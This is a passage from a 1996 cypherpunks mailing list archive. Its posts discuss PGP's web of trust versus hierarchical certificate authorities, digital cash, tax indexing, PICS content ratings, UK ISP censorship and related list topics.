We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 8 May 1996 10:36:18 +0800
To: cypherpunks@toad.com
Subject: Transitive trust and MLM
Message-ID: <199605071750.KAA03884@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have a few thoughts relating to the "web of trust" versus
hierarchical key certificate systems.  This description is pretty
elementary and is intended more for people who have not been familiar
with the issues before.  First some background.

The problem to be solved is how to know that a particular public key
is actually associated with a particular person.  This actually gets
into some fuzzy philosophical areas in terms of what we mean by a
person and what this association involves, but let's avoid those and
just consider the specific question of binding a key to a particular
email address and/or user name.

Most of the "corporate" systems being advanced today use a
hierarchical approach.  One or a small number of trusted key
certification authorities (CAs) are at the root of a tree.  The root
CA issues key signatures binding keys to ID's.  However usually these
are not the ID's of end users, but rather of other lower-level CA's
who will be associated with some smaller domain.  These may sign yet
other CA's keys, until the whole world is partitioned into small
enough pieces that the lowest level CA's actually sign user keys.

This is often mapped onto a corporate model where a company has a
master CA key which gets signed by the root CA (or perhaps by a lower
level CA between the root and corporate level), and which then,
depending on the company size, may directly sign the keys of
employees, or at the other extreme will sign keys for a division,
which will sign them for a department, which will sign them for a
group, which will then sign the employee's keys.  Similar structures
can be used for educational institutions as well.

The idea behind this is that at each level only a relatively small
number of keys are needed, and the signatures are on entities closely
related to the key doing the signing.  So the key signer is in a
position to verify the accuracy of the signatures he is making.

PGP uses a completely different system which Phil Zimmermann calls the
"web of trust".  It also uses the idea of key signatures, but there is
no hierarchy.  Instead, each person individually decides which other
signers he will trust.  A key which has a signature from a trusted
signer is accepted as validated.  PGP also allows people to specify
other signers as partially trusted.  A key will be accepted if it has
multiple signatures by partially trusted signers.

It is important to eliminate a common misconception about the web of
trust.  Suppose Alice signs Bob's key, and Bob signs Clara's, and
Clara signs Don's key.  Suppose further that Alice trusts Bob and Bob
trusts Clara as key signers, but that Alice doesn't know Clara.  In
terms of PGP's web of trust, this does not give a chain from Alice to
Don which lets her trust his key.  Alice has to have a signature on
Don's key by someone she trusts.  In this case, since she doesn't know
Clara she presumably can't trust her, and hence Clara's signature on
Don's key is worthless to Alice.

I had many discussions with Phil during the time when he was
developing this concept, and he was adamant about the importance of
this point.  The phrase he used was "trust is not transitive".
Transitivity is a mathematical property where if A has some relation
to B, and B has the same relation to C, then A has that relation to C.
For example, "greater than" is transitive with respect to numbers.
But trust in general cannot be considered to be transitive in this
sense, as Phil saw it.  Asking Alice to trust Bob to sign keys is one
thing.  But asking her to trust everyone that Bob trusts as a key
signer is something else.  That requires a lot more insight into the
mind of the other person, to judge not only whether he is careful
about his key signatures, but whether he is careful about judging how
careful other people are about key signatures.

The situation reminds me of a maxim of multi-level marketing (MLM)
companies like Amway.  These businesses typically sell a product, but
they use a pyramid scheme for distribution where people not only sell
the product, but try to recruit others to sell for them.  Each person
not only gets profit for the sales he makes, but he gets a share of
the profit for sales made by the people he recruited, and a further
smaller share of the profits from the people they recruit, and so on.
If he gets a large enough "downline" of people selling below him then
he can actually retire and just live off the profits they are
producing.  At least, that is part of the sales pitch for these
outfits.

To achieve success, though, the saying goes like this: You not only
have to sell; you not only have to teach your people to sell; but you
have to teach your people to teach people to sell.  Only once you have
developed this skill do you have a chance of having really big success
in MLM.  The idea is that being a good salesman is not enough.  You
have to recruit people and teach them to be good sellers, but that is
not enough either.  You also have to take your recruits and teach them
not only to be good sellers, but also teach them how to pass this
knowledge on down the line so that the whole downline thrives.

(It does seem strange that the saying stops where it does.  Don't you
also have to teach your people to teach people to teach people to
sell, etc.?  I think though the human mind starts to lose track of
what these increasingly abstract goals would mean.  Stopping where
they do conveys the idea that the teaching must be carried on
indefinately at each level.)

The analogy to transitivity of trust is this.  If you want to have
transitive trust, you have to be sure the other person knows how to
securely sign keys.  But you also have to make sure he knows how to
make sure that the next person knows how to securely sign keys.  And
further you have to make sure he knows how to make sure the next guy
knows how to make sure, and so on.

Note too that the hierarchical structure of the MLM is similar to that
used in traditional hierarchical key CA's.  So this points out one of
the big problems with these systems, which is the requirement to have
transitive trust.  Just trusting the root CA is not enough.  You have
to trust that it makes sure that all the CA's whose keys it signs will
be careful, as well.  And further it has to make sure that each
lower-level CA will pass on the need for care to all the CA's below
it.

At the time this concept was created, several years ago, users of the
net largely consisted of students and employees of national labs and
large corporations.  The hierarchical idea mapped pretty well into the
large bureaucracies which ran these places.  But today things are
different.  It's hard to see how a hierarchy would work for the
subscribers to AOL or MSN.

So instead one idea is to flatten the hierarchy.  Instead of a CA
giving out perhaps a few dozen key signatures, it might give out
hundreds of thousands.  Obviously this is a totally different concept
in terms of the checking possible and the security of the resulting
signatures.  At least there is less delegation and transfers of trust.
But the logistical problems can be very large.

PGP takes care to avoid transitive trust.  When you mark various key
signers as trusted, it is very careful to strip out that information
when you extract a key for sending to someone else.  Phil had another
reason for this beyond the general difficulties mentioned above.  The
basic problem is the social implication of trusting or not trusting
another person as a key signer.  Revealing that information could
cause difficulties.  People might be offended to learn that someone
else doesn't trust them.  Worse, people might feel pressure to trust
someone else if this were public knowledge.  Maybe the other person is
in a position of power where publically offering trust would be
valuable.  These kinds of social interactions could ruin the meaning
of the trust markings.  So PGP doesn't allow it at all.

However the problem is then that with PGP it is hard to find someone
you trust who can reliably sign the keys of people you want to
communicate with.  In a small group with many social interactions it
can work OK, but if you see a random posting by someone who sounds
interesting, the chances that you know someone who has signed his key
are very small.  So I don't think that the web of trust in practice
works very well, at least for a lot of the communication that people
do.

Unfortunately we are left with a choice between three not very good
possibilities: accept transitive trust and hierarchical key CA
structures; use very flat hierarchies where one signer validates huge
numbers of keys; or accept that only a small number of keys can be
validated by key signatures.  I think all these are troublesome and in
fact it makes me question the whole notion of key signatures.

Hal Finney

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBMY+NZxnMLJtOy9MBAQEE6gIAro4leHAsPn6OaqDreXY9/zhhOgQjLKTB
YzESC3lmIDEo1TnSGeibh2pM4N+VfO6ReqB5GQP0vxss2Rb3Ud2yug==
=KFDL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 8 May 1996 11:25:01 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199605071754.KAA04543@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Why not digitial "bearer" instruments be non-negotiable without
a given signature?

I suppose these wouldn't be "bearer" but whatever we call them,
doesn't this solve the double spending problem somewhat?

For example.  Why not have the bank issue the note to an anonymous
entity who has a public key on record with the bank.

In the absence of a signature from the related secret key, the
instrument will not be honored.

The instrument can be converted to a bearer instrument by the holder
at any time by signing it over to noone as opposed to signing it over
to a named party or key.  (Much like making a check payable to "cash")

The double spending problem is solved to the degree the key of the
intended payee is secure.  No?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 8 May 1996 08:07:47 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Why I Pay Too Much in Taxes
In-Reply-To: <adb3e58a0002100485c4@[205.199.118.202]>
Message-ID: <Pine.SUN.3.93.960507110412.16845J-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 6 May 1996, Timothy C. May wrote:

> By the way, as long as I've added another comment to this not-very-relevant
> thread (but one which has generated a lot of comments, so it's hard to hard
> folks aren't interested), I should mention that I left out the effects of
> INFLATION in my "60%" figure.

[...]

> Also, the effect of inflation has been to inflate salaries and thus inflate
> people into higher tax brackets, even when their "real wages" have not gone
> up.
> 
> If we ever get really bad inflation again (>10% per year, as we had in the
> late 70s, early 90s), or, God forbid, hyper-inflation, the tax system will
> likely not survive in anything near its current form.

Section 1(f) of the Federal Income Tax Code provides:

(f) Adjustments in Tax Tables so that Inflation Will Not Result in Tax
Increases.-

(1) In General.- Not later than December 15 of 1993, and each subsequent
calender year, the Secretary shall prescribe tables which shall apply in
lieu of the tables contained in [the tables which define the tax brackets]
with respect to taxable years beginning in the succeeding calander year.

(2) Method of prescribing tables.-  [The tables] shall be prescribed-

(A) by increasing the minimum and maximum dollar amounts for each rate
bracket for which a tax is imposed under such table by the cost-of-living
adjustment for such calender year,

(B) by not changing the rate applicable to any rate bracket as adjusted
under subparagraph (A), and

(C) by adjusting the amounts setting forth the tax to the extent necessary
to reflect the adjustments in the rate brackets.

[deletions]

This, at least, has been considered.

> 
> --Tim May
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Wed, 8 May 1996 11:14:54 +0800
To: cypherpunks@toad.com
Subject: MS Personal Effects Exchange
Message-ID: <199605071921.MAA16627@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Interesting proposal from Microsoft regarding digital certificates
(containing keys and a variety of other information) that can be moved from
one computer to another.

A typical marketing response viewing Navigator supports certificates and
Explorer doesn't.  If certificates really take off, that 80 to 90% of the
market that currently uses Netscape is going to be hesitant to switch over
to Explorer.

Love the name.  Aren't personal effects what are left over after they
body-bag you or what the the cops call the contents of your pockets after
you're busted...

Details at:

http://www.microsoft.com/INTDEV/SECURITY/BRINK009.HTM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 8 May 1996 11:01:42 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: Transitive trust and MLM
In-Reply-To: <199605071750.KAA03884@jobe.shell.portal.com>
Message-ID: <199605072011.NAA15883@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


HF:

a very brilliant and thoughtful essay that sparks many ideas for
me. I am sure you will be flamed, or someone will want to,
for your analogy of hierarchical CA's to MLM, but imho you are right
on there!! a beautiful analogy to help the public see why hierchical
CA's are not very pretty.

what amazed me is that you didn't introduce the concept of a graph.
clearly, the web of trust and the hierarchical CA are actually just
different kinds of graphs. (for the uninitiated, a graph is a network
consisting of nodes and edges.) the hierarchical CA is a tree. PRZ's
"web of trust" is a graph that is not treelike. the point you make
about his trust being "non transitive" is actually saying (as I
understand it) that trust only propagates to adjacent edges 
in the trust graph, but not further.  that is,  say A trusts B,
and B trusts C. a "trust link" exists between A and B and B and C.
but a trust link does not exist between A and C. 

interestingly, beginning CS students learn to create a "transitive
closure" of a graph by drawing all the missing links. this is
effectively what is going on in a Hierarchical CA. a path of links implies
a link between all the nodes in that path.

your point that the "trust graph" is the most problematic area
of cryptography at this point is really right on the nail. we
all have to realize that Public Key Cryptography solved one
vexing problem, the requirement of the preexistence of a secret
channel. but it does not solve another problem-- ensuring that
keys are associated with the individuals one communicates with.

what I was thinking as I read your essay was that perhaps some
new metrics are called for. it seems to me that people are hitting
a brick wall in thinking, "trust is something that is either there
or it isn't". I think in the graph situation what we really have
is information about the "strength" of a trust link between nodes.

the problem then can be generalized: suppose I have a graph
of edges, and numerical weights that represent the trust between
entities represented by the nodes of the graph. the question is,
suppose A wishes to know the strength of his trust from himself
to some other entity C.

it should be clear that this is in fact a variation of the 
"shortest path" problem. it suggests a straightforward depth-
or breadth-first search. the code could tell you the "strongest
trust path" between you and some entity using some heuristic,
such that the trust between you and this person is the
average of the trust of all the traversed links, or something
like that. I am not saying this is the correct formula: it would
be interesting to try to find other formulas that are "correct"
in the sense that they truly model trust. (another obvious formula
would decrease the trust strength dramatically if any link in
the chain were weak.)

I would be interested to hear what people
think a correct "trust formula" should be. in fact what you
have delineated HF, are two extreme trust formulas at different
ends of the spectrum. (hope I get this right)

1. the HCA (hierarchical certification authority scheme). 
all trust links are 0 or 1. (0 is the same as no link). the
trust between entity A and entity B is 1 if a path exists
between them, 0 otherwise.

2. the PRZ scheme. all links are 0 or 1. a trust exists
between A and B if B is adjacent to A, 0 otherwise.

it seems to me that possibly neither is "correct", and that
perhaps a "correct" formula may not even exist. there are
clearly other variations. I'm being a bit sloppy, and I'd
be happy for anyone to hammer out these ideas with more
rigor.  what might be ideal is if every person could choose
to use whatever trust algorithm they desired. (that is,
a system that supported *both* HCA and PRZ is easily 
conceivable, with the consumer determining how he wishes
to use the "trust data", although PRZ complicates this
by insisting that some trust data must be secret)

and as I wrote, other possible algorithms, with 
some obvious defects:

3. trust is measured as 0 to 1, or perhaps -1 to 1. the 
trust between A and B is the highest average possible in
the path between A and B. ("optimistic")

4. or, trust is measured as the worst average possible. 
("pessimistic")

5. trust is the product of trust values.

etc.

what we have is a graph in which some links are explicitly
given, and we have to "derive" some of the implied links
based on our knowledge of "trust properties" and the given
trust values.

it is quite interesting that in fact the problem of "secrecy"
is replaced by that of "trust" by PKC, and that to adequately
solve the "trust" problem, we must try to figure out what its
actual properties are. how does human trust work? how should
it work? are there ways to formalize or optimize the
informal "algorithms" that people use to deal with trust issues?
we are getting into some deep psychological issues. can
trust be quantified?

also, there are some other obvious computational problems
that immediately ensue. how can we efficiently store all
this graph information? is there a way to distribute it
over a network? how can we efficiently respond to "trust
queries"? etc.

it seems to me that both PRZ's scheme and the HCA scheme
are only the very first, most basic ideas of how to tackle
these complex issues and that we are likely to see new
variations by others. it is quite possible that some cpunks
may help immensely in refining the field.

here is another idea: it appears what we have is a trust
graph in which some people may want to selectively reveal
or conceal their trust. this complicates things because
now the algorithms may or may not run on the "open trust"
values, or the "secret/hidden values", etc.  ugh!!! the trust
network itself is subject to the kind of secrecy and
hiding that is associated with the original problem it
tries to solve (i.e. conveying secret information).

hence it seems to me a good "trust network system" would support
some things:

1. allow efficient trust queries, without severe problems associated
with "nearness" of the participants. 

2. allow individual users to decide how they wish to use
the system, possibly supporting *both* HCA and PRZ etc.
(we all seem to be working from the assumption they are
mutually exclusive. but do they really have to be? is there
really a "best" algorithm, or is the best situation to
actually allow different algorithms for different situations?)

3. allow people to selectively reveal or conceal their 
trust values.

4. be distributed.

5. not rely on a central authority.

etc.-- additions, anyone?

it appears there is a rich vein of memes in all this beyond
the basic territory explored by PRZ and HCA for someone to mine.
in fact I'm surprised their aren't more academic papers out on
this subject that tackle some of the things I am referring to 
above (alternate trust algorithms, trust as a network, etc.)

maybe someone would like to work up some alternative prototypes
ala the way remailers were developed in this "community".





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 8 May 1996 11:24:58 +0800
To: "Joseph M. Reagle Jr." <reagle@mit.edu>
Subject: Re: misunderstandings of PICS
In-Reply-To: <9605071940.AA18800@rpcp.mit.edu>
Message-ID: <199605072019.NAA16493@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>        Two may be quite successfully accomplished using PICS. Europe
>(Germany and Nazis) and China/Singapore could make quite effective use of
>PICS if they require that all browsers in their country be sold with their
>rating (censorship) system included (and if they mandate that government
>label bureaus _must_ be used.)

well, in any case the idea that there should ever be any pressure
of page designers to include certain tags I find wholly inconsistent
with the original PICS proposal and rather abhorrent. unfortunately
it may be unavoidable.

> The reason self-rating is mentioned is to forestall the fear of
>mandated/arbitrary third party rating. Rather than some MPAA like system
>being imposed by the govt., the self-rating was a better political/strategic
>position. Also, self rating scales well until third party label bureaus are
>sufficiently developed. 

my fear is that the supposed "failure" of self-ratings could be twisted
by its opponents as evidence that it is inadequate to deal with the
real problem. in other words, they might say, "look, the self-rating
thing clearly doesn't work, people don't label their stuff right even
when they are pressured to, therefore we must now have a government
agency with mandatory controls. forget the 'rating server' idea, 
ratings by people within cyberspace just don't work".

I am not against self-ratings, I'm just saying that they seem to
be the area most ripe for being misunderstood by the public, or
lead to undesirable situations, and this is already happening.

its quite scary to me that the things that the designers were trying
to accomplish with the system might be totally reversed and
corrupted in practice to accomplish something they wouldn't have
wanted in their worst nightmares. I'd like to see an effort to
work against this to the greatest degree possible.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Wed, 8 May 1996 10:56:59 +0800
To: cypherpunks@toad.com
Subject: [JKinney@commprod.com: Security Engineer Needed for a Project]
Message-ID: <199605072034.NAA17147@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

Here's an opportunity for somebody who knows something about NetWare.
I don't know anything other than what is posted below.  Call or write
Don Wagner for more info.

Eric Blossom

----------------------------------------------------------------

X-Mailer: Novell GroupWise 4.1
Date: Tue, 07 May 1996 13:00:05 -0500
From: Jim Kinney <JKinney@commprod.com>
To: eb@comsec.com
Cc: dwagner@commprod.com
Subject:  Security Engineer Needed for a Project

Eric:

Listed below is a description of a Network Security Specialist that we
have a requirement for on one of our Defense contracts.  This work
would be performed either in Indy or Pensacola, FL.  Can you please
forward this to the CypherPunks or other appropriate mail group for
distribution?

+++++++++++++++++++++++++++++++++++++++++++++
Novell NetWare Security Specialist

The Novell NetWare expert shall have expert knowledge in NetWare 4.x 
     internals and NetWare 4.x security. The individual shall have 
     programming experience writing applications to access NetWare security 
     functions that alter NetWare attributes like rights, passwords and 
     access list, etc. This individual shall be knowledgeable about the 
     various NetWare-related configuration parameters, including those 
     associated with IPX/SPX, NUC, NVT and SAP. This individual shall have 
     extensive C and Assembly language programming experience using DOS 
     and/or Windows that interfaces with Novell NetWare Application 
     Programming Interface (API) or NetWare Loadable Module (NLM) APT. 
     Lacking these specific skills, this individual shall be knowledgeable 
     with NetWare internals and have experience in both application and 
     system programming. This individual shall be knowledgeable about LAN 
     analysis techniques, hardware, memory configurations, NETBIOS 
     protocols, BTREIVE, and other NetWare or Windows APIs.
+++++++++++++++++++++++++++++++++++++++++++++++

Anyone interested should respond to:

Attn: Mr. Don Wagner
CPI
7301 E. 90th St.
Indianapolis, IN  46256
Fax: 317-842-0278
email: dwagner@commprod.com

Thanks in advance for your help.

jk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "msmith" <msmith@rebound.slc.unisys.com>
Date: Wed, 8 May 1996 12:26:01 +0800
To: cypherpunks@toad.com
Subject: Re: Senator Leahy's Public Key
In-Reply-To: <199605050623.XAA17801@netcom8.netcom.com>
Message-ID: <199605071951.TAA14244@rebound.slc.unisys.com>
MIME-Version: 1.0
Content-Type: text


Bill Frantz said:
> The more I think about Senator Leahy's public key, the more I keep coming
> back to a point I only alluded to before.
> 
> How do we know the key is actually his key?
> 
> The key is only self signed.  It could be a fake.  If, as I have assumed,
> its primary use will be to sign public statements posted to the net, how
> will we know they are actually from Senator Leahy, and not some impostor?
> 
> I strongly urge the senator to join the web of trust and get some other
> signatures on his key.

Actually, I've been thinking about this, and how do we *really* know that
*anyone's* keys are actually theirs?  I'm new to this list and have been 
collecting some of the keys from people who post with PGP signatures, but 
even at that, I never certify them myself because I am not 100% absolutely
certain that the key in question belongs to that person.  After all, what
if some clever hacker dropped in and replaced someone's .plan file, or 
edited their index.html file?  There's no real way to be absolutely 
certain.

How certain are we that the keyservers are 100% bulletproof?  Hell, I 
could call Joe Schmoe up and say "tell me your fingerprint", but how do I 
*really* know I'm talking to Joe unless I knew him before getting his 
signature?  

Just some thoughts about some of the basic flaws in this sort of system.  

BTW, I collect the signatures because I have a patched version of Elm which
goes out and automatically tries to verify all PGP signed messages, and 
it's kind of annoying when it can't find the signature (all sorts of junk
goes sprawling up my screen).  


> Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
> (408)356-8506     | lost jobs and  | 16345 Englewood Ave.
> frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA

-- 
Matt Smith - msmith@unislc.slc.unisys.com
"Nothing travels faster than light, with the possible exception of bad news, 
which follows its own rules." - Douglas Adams, "Mostly Harmless"
Disclaimer:  I came up with these ideas, so they're MINE!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 8 May 1996 11:49:44 +0800
To: cypherpunks@toad.com
Subject: money laundering conference
Message-ID: <199605072054.NAA22977@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain



OTC  05/06 1518  ADVISORY/International Money  Laundering ...

 (May 6) BUSINESS WIRE -May 6, 1996--With attendees coming from across the
United States and from Latin and South America, more than 200 people are
expected to participate in the Third International Money Laundering Conference
May 15 and 16 in Miami. 
   The likely attendance is the largest since the conference was first held in
1993. 
   "New federal rules and laws, as well as concerns about emerging techniques to
launder money, such as using the Internet, are generating intense interest,"
said Charles A. Intriago, publisher of Money Laundering Alert and a leading
authority on the subject. 
   Money Laundering Alert is co-sponsoring the conference with America Lawyer
Media, which publishes American Lawyer magazine and operates the Court TV
network.  ALM also publishes the Daily Business Review in South Florida. 
   This year's conference will include panel discussions on sush topics as ways
to detect and counter new forms of money laundering including so-called
"cyberlaundering" and trade laundering; the "alphabet soup" of world money
control rules, laws and organizations; cooperative blueprints for financial
institutions and governments to prevent money laundering; hidden traps in U.S.
laws, new suspicious reporting rules and the workings of the U.S. Office of
Foreign Assets Control. 
   Speakers include officials from the IRS, SEC, FBI, Federal Reserve, Office of
the Comptroller, Justice Department and other government agencies, as well as
private-sector bankers, lawyers and academic experts.  Among the panelists this
year are Senior U.S. District Judge William M. Hoeveler of Miami, the presiding
judge in the federal government's money laundering case against former
Panamanian dictator Manuel Noriega, Gerald F. McDowell, chief, asset forfeiture
and money laundering section of the U.S. Justice Department, Richard A. Small,
special counsel, Federal Reserve Board, and John J. Byrne, senior legislative
counsel for the American Bankers Association. 
   The two-day session will be held at the Hyatt Regency Hotel in downtown
Miami. Information on conference attendance can be obtained by calling Money
Laundering Alert at 800/232-3652, or 305/530-0500 (Fax 305/530-9434). 
Reservations can be made by calling the Hyatt at 305/358-1234.  There are still
a limited number of places available. Limited sponsorships for conference events
are also available. Credentials for accredited members of the media will be
extended. The conference is drawing interest from news media in this country,
South America and Europe. 
   --30--jd/mi    CONTACT:  Alert Publications 

     Wendy Brown, 305/530-0500 
     or 
     Daily Business Review 
     Martin Donsky, 305/347-6617  KEYWORD:  FLORIDA INDUSTRY KEYWORD: BANKING
PUBLISHING ADVISORY  REPEATS: New York 212-575-8822 or 800-221-2462; Boston
617-236-4266 or         800-225-2030; SF 415-986-4422 or 800-227-0845; LA
310-820-9473 BW URL: http://www.businesswire.com 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 8 May 1996 12:11:07 +0800
To: cypherpunks@toad.com
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <adb505a504021004f699@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:46 PM 5/7/96, Black Unicorn wrote:

>I'm not sure I understand what you mean.  I sent the text of the law to
>the list.  The position that you take (that increse in inflation can send
>you into the next tax bracket) is incorrect.

I wrote my comment before I saw your message. Does this make it clearer?

I agree that the fewer brackets have lessened the problem in the last
couple of years, but, then, inflation has not been an issue in the last
couple of years. (I seem to recall an explicit statement that the brackets
would not be adjusted upward, as the bill called for, because the inflation
rate had been below the threshold....).

In any case, my larger point has been about the effect over the last decade
or so, where significant numbers of people are now up at the 40-45%
marginal tax rate (Federal plus state, in many states).

...
>Rates will not change with respect to inflation (to the extent that
>inflation is accurately measured by the CPI).
>
>I believe an exception was made for the top bracket in 1994, but I don't
>recall how it was implemented.

The top marginal rate was increased. As I recall, from around 38% to around 42%.

(As the money runs out, as the so-called trust funds turn out to be empty,
as "entitlements" expand, and as more and more people are too
poorly-educated and -motivated to succeed in high-paying jobs, I expect the
top marginal rate to continue to be ratcheted upward. Until other forces
come into play, of course.)


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "msmith" <msmith@rebound.slc.unisys.com>
Date: Wed, 8 May 1996 10:47:48 +0800
To: cypherpunks@toad.com
Subject: Re: UK IP Censorship
In-Reply-To: <199605061552.IAA15075@jobe.shell.portal.com>
Message-ID: <199605072010.UAA14295@rebound.slc.unisys.com>
MIME-Version: 1.0
Content-Type: text


Anonymous said:
> 
> Financial Times, 6 May 1996
> 
> Internet provider to launch censorship
> 
> By James Mackintosh in London
> 
> Unipalm Pipex, the biggest provider of Internet access to
> British businesses, has acceded to government calls for
> voluntary censorship in a significant boost to ministerial
> attempts to restrict access to electronic pornography.

[ deletia ]

Well, time to start posting dirty pictures to rec.arts.tv.uk.

-- 
Matt Smith - msmith@unislc.slc.unisys.com
"Nothing travels faster than light, with the possible exception of bad news, 
which follows its own rules." - Douglas Adams, "Mostly Harmless"
Disclaimer:  I came up with these ideas, so they're MINE!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "msmith" <msmith@rebound.slc.unisys.com>
Date: Wed, 8 May 1996 12:15:55 +0800
To: cypherpunks@toad.com
Subject: Re: Police tactics question
In-Reply-To: <01I4E2S0NTES8Y583T@mbcl.rutgers.edu>
Message-ID: <199605072045.UAA14348@rebound.slc.unisys.com>
MIME-Version: 1.0
Content-Type: text


> 	I've often heard of the police/postmaster mailing someone child
> pornography prior to going in and busting them for possession of it. What are
> the legal matters in such cases?

Well, that's how they busted the Amateur Action BBS from what I remember.  
Basically they mail you the porno, arrest you as soon as you pick up the box, 
and then that gives them probably cause to get a warrant to rip apart your
computer and charge you with other things.  The charges that were filed 
against Robert Thomas (sysop of the AA BBS) for picking up that box were
eventually cleared, but he was convicted of other charges apparently. 

So it's more used as a tool to find other charges.  Those charges are 
eventually dropped.

> 	Thanks,
> 	-Allen

-- 
Matt Smith - msmith@unislc.slc.unisys.com
"Nothing travels faster than light, with the possible exception of bad news, 
which follows its own rules." - Douglas Adams, "Mostly Harmless"
Disclaimer:  I came up with these ideas, so they're MINE!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 8 May 1996 13:06:36 +0800
To: Hal <cypherpunks@toad.com
Subject: Re: Transitive trust and MLM
Message-ID: <199605072229.PAA28013@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:50 AM 5/7/96 -0700, Hal wrote:
>Unfortunately we are left with a choice between three not very good
>possibilities: accept transitive trust and hierarchical key CA
>structures; use very flat hierarchies where one signer validates huge
>numbers of keys; or accept that only a small number of keys can be
>validated by key signatures.  I think all these are troublesome and in
>fact it makes me question the whole notion of key signatures.

Some of the solution to this problem may come from the answer to the
question, "What am I trusting the receiver with?"  I can see a number of
possibilities:

(1) I just want an envelope so casual eavesdroppers can't read the mail. 
Given the people Rich Graves has been dealing with, I see this as a
powerful reason to encrypt all private email, just as you might send all
private postal mail in envelopes rather than on postcards.

In this case, I don't need a lot of confidence.  Yes, a man-in-the-middle
(MIM) can read the mail, just as the post office can open the envelope. 
However, the rest of the world won't see it unless the MIM wants to get
caught.  End-to-end, out of band acknowledgements can ensure that the
message gets thru.  (If the people I'm going to the mountains with don't
pick me up, and I got in-band acknowledgements, I WILL suspect a MIM.)

(2) I am sending someone else's secrets to a perfect stranger.  An example
might be sending company confidential information to a researcher another
company R&D center half way around the world.

In this case, I want to get the key from a location approved by the owner
of the secret, making the problem the companies and not mine.

(3) I am sending information which, if released, might cause significant
harm to me or someone close to me.

I can't see sending information of this nature to someone I don't know
really well.  In this case, out-of-band key fingerprint exchanges will work
well.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Wed, 8 May 1996 10:27:12 +0800
To: "E. ALLEN SMITH" <vznuri@netcom.com
Subject: Re: misunderstandings of PICS
Message-ID: <9605071933.AA18725@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 04:40 PM 5/6/96 EDT, E. ALLEN SMITH wrote:

>        In other words, the CyberAngels want to eliminate any pages that
>contain material they think minors shouldn't see that aren't self-rated with
>a PICS self-rating (the first of the three types) intended to block minors
>from seeing it. Yes, this is an abuse of the market oriented variety of PICS;
>they obviously don't know and/or don't care. If you want to convince them
>otherwise, start cc:ing your messages (and forwarding mine, on this I give you
>permission) on PICS and the CyberAngels to angels@wavenet.com.

        I didn't see the cyberangel proposal, but how is this an abuse?
Regardless, it's a waste of time, browsers will have the option of "If not
PICS labled, don't return." They're better off advising people to flip that
switch if this is such a big concern.
_______________________
Regards,       Men govern nothing with more difficulty than their tongues,
               and can moderate their desires more than their words. -Spinoza
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
